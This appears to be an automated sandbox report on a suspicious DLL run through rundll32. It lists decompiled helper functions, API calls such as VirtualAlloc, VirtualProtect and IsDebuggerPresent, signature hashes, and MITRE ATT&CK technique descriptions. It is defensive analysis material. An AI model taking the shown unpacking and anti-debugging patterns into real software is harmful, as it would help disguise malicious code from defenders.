Instruction ID: 0ceea1a3461b2d7f4af186a9cae923cb5adb29e3e50eb8dc81aaea236a318d86
Opcode Fuzzy Hash: 7dcd35167cc540435a3c0946a34c17dfb4645bcbb7d77fe70f1dbc9fb23728ff
Instruction Fuzzy Hash: 0DF03075A03312D7DB206F75BD48B467B98AB057617050712B806D7BA0DF70D8C0D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 001D5DDD, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001D5DDD() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x1dd32c; // 0x2fa95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x1dd32c; // 0x2fa95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x1dd32c; // 0x2fa95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x1de836) {
					HeapFree( *0x1dd238, 0, _t10);
					_t7 =  *0x1dd32c; // 0x2fa95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x001d5ddd
0x001d5de6
0x001d5df6
0x001d5df6
0x001d5dfb
0x001d5e00
0x00000000
0x00000000
0x001d5df0
0x001d5df0
0x001d5e02
0x001d5e07
0x001d5e0b
0x001d5e1e
0x001d5e24
0x001d5e24
0x001d5e2d
0x001d5e2f
0x001d5e33
0x001d5e39

APIs

RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D5DE6
Sleep.KERNEL32(0000000A,?,001D5D85), ref: 001D5DF0
HeapFree.KERNEL32(00000000,?,?,001D5D85), ref: 001D5E1E
RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D5E33

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: c46fdffba7f47d52753b9a7a3751aa12bf554be9af868d19ee1871fa444f630e
Instruction ID: c4de0dccba2c62931a6935833a9f7847edcbcb712212ed9d64db6036c052244c
Opcode Fuzzy Hash: c46fdffba7f47d52753b9a7a3751aa12bf554be9af868d19ee1871fa444f630e
Instruction Fuzzy Hash: 64F0DAB8603501EFE7189F68ED99B1677E6EB08341B04451BF902DBB70C734AC80DA21

Uniqueness

Uniqueness Score: -1.00%

Function 6E284CF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E284D00

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__getptd.LIBCMT ref: 6E284D0E

Strings

csm, xrefs: 6E284D1C

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction ID: 9b689df2e93c90cfe3b88afbdde7a58eb56457c794f2d617600283ce77bad02f
Opcode Fuzzy Hash: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction Fuzzy Hash: 00014F3480030A8BCB74CFA0D860A9EB7BFBF51216F54491DD0515A5D1CB30968ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 001D8389, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001D8389(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E001D7E20(_t2);
				if(_t34 != 0) {
					_t30 = E001D7E20(_t28);
					if(_t30 == 0) {
						E001DA5FA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E001DA8C7(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E001DA8C7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x001d8389
0x001d8393
0x001d8395
0x001d839b
0x001d839b
0x001d83a4
0x001d83a8
0x001d83b4
0x001d83b8
0x001d842c
0x001d83ba
0x001d83ba
0x001d83be
0x001d83c3
0x001d83c8
0x001d83e2
0x001d83d1
0x001d83d1
0x001d83d5
0x001d83d8
0x001d83dd
0x001d83dd
0x001d83e7
0x001d840f
0x001d8415
0x001d8418
0x001d83e9
0x001d83eb
0x001d83f3
0x001d83fe
0x001d8403
0x001d8403
0x001d841f
0x001d8426
0x001d8427
0x001d8427
0x001d83b8
0x001d8437

APIs

lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,001D5741,?,?,?,?,00000102,001D6187,?,?,00000000), ref: 001D8395

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

Part of subcall function 001DA8C7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,001D83C3,00000000,00000001,00000001,?,?,001D5741,?,?,?,?,00000102), ref: 001DA8D5
Part of subcall function 001DA8C7: StrChrA.SHLWAPI(?,0000003F,?,?,001D5741,?,?,?,?,00000102,001D6187,?,?,00000000,00000000), ref: 001DA8DF

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5741,?,?,?,?,00000102,001D6187,?), ref: 001D83F3
lstrcpy.KERNEL32(00000000,00000000), ref: 001D8403
lstrcpy.KERNEL32(00000000,00000000), ref: 001D840F

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 22109cd8215da9dea32bd0226a00baa61aa00a00c059319d1f1c12b09f28697b
Instruction ID: 30ff820f00de0286c790742251cefb9f6d0a0aac0534f7f081538e1a961ba473
Opcode Fuzzy Hash: 22109cd8215da9dea32bd0226a00baa61aa00a00c059319d1f1c12b09f28697b
Instruction Fuzzy Hash: 5021AF72504256FFCB12AF74DC84BAF7FA8AF26380B158056F9059B342DB35C941D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001D8FE0, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D8FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E001D7E20(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x001d8ff5
0x001d8ff9
0x001d9003
0x001d9008
0x001d900d
0x001d900f
0x001d9017
0x001d901c
0x001d902a
0x001d902f
0x001d9039

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,02FA937C,?,001D581A,004F0053,02FA937C,?,?,?,?,?,?,001D8522), ref: 001D8FF0
lstrlenW.KERNEL32(001D581A,?,001D581A,004F0053,02FA937C,?,?,?,?,?,?,001D8522), ref: 001D8FF7

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,001D581A,004F0053,02FA937C,?,?,?,?,?,?,001D8522), ref: 001D9017
memcpy.NTDLL(74B069A0,001D581A,00000002,00000000,004F0053,74B069A0,?,?,001D581A,004F0053,02FA937C), ref: 001D902A

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: bacf907779707be1f004e9ba52bb002e6fdefcc2d3b1d8b77bb00a748dcea7da
Instruction ID: f673984a7d46867447753d552d80295cb5569e3304fa31ec0de5330f6e22979b
Opcode Fuzzy Hash: bacf907779707be1f004e9ba52bb002e6fdefcc2d3b1d8b77bb00a748dcea7da
Instruction Fuzzy Hash: 54F03736901119BB8F11AFA8DC85C8F7BACEF192947018463F90497202E731EE108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D8007, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02FA9918,00000000,00000000,7742C740,001D2B1B,00000000), ref: 001D8017
lstrlen.KERNEL32(?), ref: 001D801F

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

lstrcpy.KERNEL32(00000000,02FA9918), ref: 001D8033
lstrcat.KERNEL32(00000000,?), ref: 001D803E

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 9e799e77a48f14aac896e115932d5c1bf4c5c519cc91bf54a34e6f13920f789f
Instruction ID: 79eecf98bedc0115b8928cb57cf5804f1a5c01cddb6e3c78e5a6d7b08d2811d1
Opcode Fuzzy Hash: 9e799e77a48f14aac896e115932d5c1bf4c5c519cc91bf54a34e6f13920f789f
Instruction Fuzzy Hash: 91E01277503621AB87115BE8AC48C6BBBADFF997517044857F600D3220C7259805CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5788 Parent PID: 1720 rundll32.exeCOMMON

Executed Functions

Function 6E2B5770, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000007D1,00003000,00000040,000007D1,6E2B51C8), ref: 6E2B582D
VirtualAlloc.KERNEL32(00000000,00000059,00003000,00000040,6E2B5229), ref: 6E2B5864
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E2B58C4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B58FA
VirtualProtect.KERNEL32(6E240000,00000000,00000004,6E2B574F), ref: 6E2B59FF
VirtualProtect.KERNEL32(6E240000,00001000,00000004,6E2B574F), ref: 6E2B5A26
VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F), ref: 6E2B5AF3
VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F,?), ref: 6E2B5B49
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B5B65

Memory Dump Source

Source File: 00000003.00000002.479222451.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction ID: 6c745d1252552f361657073bcf2cc6166a8526736039d4674cf52b66e0d2632a
Opcode Fuzzy Hash: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction Fuzzy Hash: 24D1BBB21446019FEB25CF44C8C0F51B7B7FF58318B096198ED8D9F65ADB70A820CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6E277FA0, Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,6E2CB428,0000311C,00000040,6E2C9B0C), ref: 6E278058

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
Instruction ID: a1e582854bca625b96c46d89573d95dd9aa2b686df78d7d56fd599bbbd57d549
Opcode Fuzzy Hash: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
Instruction Fuzzy Hash: 8681EF70D08918DBCF18CF6DC99CA25BBA3BF4A30C3048A2AE64987345D6F4A484CF74

Uniqueness

Uniqueness Score: -1.00%

Function 6E281BB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E28173D,?), ref: 6E281BC6

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
Instruction ID: 979237c94ca83251f38fa3d8fdcc203498a54548063c7a51e60539beca9bf256
Opcode Fuzzy Hash: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
Instruction Fuzzy Hash: 66D02E32950B085ADB004EB2A80CB623BDDC386BA6F004832B90CC6080F6B0C084CA10

Uniqueness

Uniqueness Score: -1.00%

Function 6E2830B2, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6E2830B4

Part of subcall function 6E283040: RtlEncodePointer.NTDLL(00000000,?,6E2830B9,00000000,6E286D8F,6E2CB748,00000000,00000314,?,6E282D8E,6E2CB748,6E2AF8D0,00012010), ref: 6E2830A7

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
Instruction ID: f72adfadcf089c0e06255bea16268a7781b1895133ffda6bd4711a94e519fdd4
Opcode Fuzzy Hash: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E28150C, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E2856C7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2856DC
UnhandledExceptionFilter.KERNEL32(6E2AFA48), ref: 6E2856E7
GetCurrentProcess.KERNEL32(C0000409), ref: 6E285703
TerminateProcess.KERNEL32(00000000), ref: 6E28570A

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
Instruction ID: 526dc63793b17d5a37da057f743e3237281c9d7fc359027ad85e1321952faa65
Opcode Fuzzy Hash: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
Instruction Fuzzy Hash: 2C2116B8900A08DFCF81CF68C94C6457BB6FB0AB06F50481AEA0A8738CE7B45585CF75

Uniqueness

Uniqueness Score: -1.00%

Function 6E27AA10, Relevance: 19.7, APIs: 13, Instructions: 172COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 6E27AA47
_strncmp.LIBCMT ref: 6E27AA69
_strncmp.LIBCMT ref: 6E27AA8B

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: _strncmp
String ID:
API String ID: 909875538-0
Opcode ID: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
Instruction ID: aef3cef9f04ad0ae90455034eb7005d4b5b2cd982321898dfad2d7607ca95451
Opcode Fuzzy Hash: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
Instruction Fuzzy Hash: 9D41E9ABB4651933F2605BC9AD02F8BA6176BF0756F048422EB44DA2C4F334D82DC7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E284BCB, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6E284BF3

Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281415
Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281423

__getptd.LIBCMT ref: 6E284BFD

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__getptd.LIBCMT ref: 6E284C0B
__getptd.LIBCMT ref: 6E284C19
__getptd.LIBCMT ref: 6E284C24
_CallCatchBlock2.LIBCMT ref: 6E284C4A

Part of subcall function 6E2814AC: __CallSettingFrame@12.LIBCMT ref: 6E2814F8

Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D00
Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D0E

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
Instruction ID: 0eeec9ef972102bf9326ffb8020914b492c23d94844a8e1d1290eaa553f34b8c
Opcode Fuzzy Hash: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
Instruction Fuzzy Hash: 6E11D7B5C0024DDFDB00DFE4C448AEEBBBAFF14318F108969E854A7290DB389A599F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E283880, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E28388C

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__amsg_exit.LIBCMT ref: 6E2838AC
__lock.LIBCMT ref: 6E2838BC
InterlockedDecrement.KERNEL32(?), ref: 6E2838D9
InterlockedIncrement.KERNEL32(6E2B3DA8), ref: 6E283904

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
Instruction ID: c099af2b697f64037b011b46a701f204f3e646c18dcbfd5dc47e02c4ec9f2e00
Opcode Fuzzy Hash: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
Instruction Fuzzy Hash: 82018435A01A2FABDB519BE5840DB8F7767BF01729F104405D824A76C0CB74698DCBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E280157, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6E280175

Part of subcall function 6E281B7E: __mtinitlocknum.LIBCMT ref: 6E281B94
Part of subcall function 6E281B7E: __amsg_exit.LIBCMT ref: 6E281BA0
Part of subcall function 6E281B7E: RtlEnterCriticalSection.NTDLL(?), ref: 6E281BA8

___sbh_find_block.LIBCMT ref: 6E280180
___sbh_free_block.LIBCMT ref: 6E28018F
HeapFree.KERNEL32(00000000,?,6E2B1A28,0000000C,6E281B5F,00000000,6E2B1AF8,0000000C,6E281B99,?,?,?,6E287A94,00000004,6E2B1E48,0000000C), ref: 6E2801BF
GetLastError.KERNEL32(?,6E287A94,00000004,6E2B1E48,0000000C,6E2858CA,?,?,00000000,00000000,00000000,?,6E2832B9,00000001,00000214), ref: 6E2801D0

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
Instruction ID: 48100bff18a6f937f6a66da222a3e7c6ac3e52cedfd87f83b3d3c8026edd1db1
Opcode Fuzzy Hash: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
Instruction Fuzzy Hash: E1018F3581661AABEB205BF19808F8F377AAF01766F240908E855661C0EB34958CCA65

Uniqueness

Uniqueness Score: -1.00%

Function 6E27DE60, Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6E27DF3A
_realloc.LIBCMT ref: 6E27DFD8
_realloc.LIBCMT ref: 6E27E07F

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: 788af7bb6f71f44278ef0184b89523640159d0c4a9c8655d359240f93e97bc90
Instruction ID: 19f2b1a2b5698bc030be2fc73ed7dce36b8fc381ca51285812ab337135a87560
Opcode Fuzzy Hash: 788af7bb6f71f44278ef0184b89523640159d0c4a9c8655d359240f93e97bc90
Instruction Fuzzy Hash: FCB1D4B46147099FD724CFA9C880A9ABBF2FF4A314F444A2DD48987751D730E949CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E27CE60, Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6E27CEFD
_realloc.LIBCMT ref: 6E27CF3E
_realloc.LIBCMT ref: 6E27CF81
_realloc.LIBCMT ref: 6E27CFC3

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: 3b0be5b34c3f7846ca78056c90f01374ff4e9c645da4d9f8a9b9701259980688
Instruction ID: eea659fa5252c56da36562e97aeb9adf6a4a0343bf46934ec0db13067a55d300
Opcode Fuzzy Hash: 3b0be5b34c3f7846ca78056c90f01374ff4e9c645da4d9f8a9b9701259980688
Instruction Fuzzy Hash: 857105B5A14B058FD760CF69C480A56FBF6FF49310B508A2ED48A8BA51E770F946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E281585, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E28159F

Part of subcall function 6E280234: __FF_MSGBANNER.LIBCMT ref: 6E280257
Part of subcall function 6E280234: __NMSG_WRITE.LIBCMT ref: 6E28025E

std::bad_alloc::bad_alloc.LIBCMT ref: 6E2815C2

Part of subcall function 6E28151B: std::exception::exception.LIBCMT ref: 6E281527

std::bad_exception::bad_exception.LIBCMT ref: 6E2815D6
__CxxThrowException@8.LIBCMT ref: 6E2815E4

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: 5e226f65ba87d7b52f5ed290a991ac3728be80a806b0ae07e46bc37ccef00f48
Instruction ID: 099dc707f8efcac4cd2bb817f67a3c68b44c7e8c2966bfd7279278625c4e0d37
Opcode Fuzzy Hash: 5e226f65ba87d7b52f5ed290a991ac3728be80a806b0ae07e46bc37ccef00f48
Instruction Fuzzy Hash: F0F0A72980020E6BDF4457E1D8199DF3B7F5F0579DB100816E836560D5DF38AACDC591

Uniqueness

Uniqueness Score: -1.00%

Function 6E283FEC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E283FF8

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__getptd.LIBCMT ref: 6E28400F
__amsg_exit.LIBCMT ref: 6E28401D
__lock.LIBCMT ref: 6E28402D

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a82135c4922b3cc903e1d4030d8b05763e2ee38c90e61dd6e498e376799424cc
Instruction ID: d56e35e1468af84d36cb9b5a2bd09079da161c53e78bdab47ca22ff819c1b0a5
Opcode Fuzzy Hash: a82135c4922b3cc903e1d4030d8b05763e2ee38c90e61dd6e498e376799424cc
Instruction Fuzzy Hash: 6FF06D36900A1D9BD725ABF58108B8F72AAAF1071DF104909D8509B2D0CBB0AD4ACA91

Uniqueness

Uniqueness Score: -1.00%

Function 6E284CF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E284D00

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__getptd.LIBCMT ref: 6E284D0E

Strings

csm, xrefs: 6E284D1C

Memory Dump Source

Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction ID: 9b689df2e93c90cfe3b88afbdde7a58eb56457c794f2d617600283ce77bad02f
Opcode Fuzzy Hash: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction Fuzzy Hash: 00014F3480030A8BCB74CFA0D860A9EB7BFBF51216F54491DD0515A5D1CB30968ACB81

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
